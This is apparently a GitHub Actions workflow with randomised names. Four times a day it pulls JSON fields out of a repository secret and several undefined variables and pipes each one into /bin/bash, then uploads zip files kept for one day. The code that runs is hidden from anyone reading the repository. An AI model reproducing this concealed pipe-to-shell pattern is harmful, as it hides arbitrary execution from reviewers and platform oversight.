name: nianyouhuangbo
on:
  workflow_dispatch:

  schedule:
    - cron: '36 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nianyouhuangbo
        env:
          vfnbn674: ${{ secrets.vfnbn674 }}
        run: |
          printf '%s' "$vfnbn674" | jq -r .tkpgc8321 | /bin/bash
          echo $akem96114 | jq -r .y77164 | /bin/bash
          printf '%s' "$zvfhv6" | jq -r .nd9696 | /bin/bash
          printf '%s' "$c8474" | jq -r .oyhiw9953 | /bin/bash
          echo $tdlut82 | jq -r .dc1 | /bin/bash
          echo $p4 | jq -r .lci32505 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: i3g1iKj2
          path: "*.zip"
          retention-days: 1
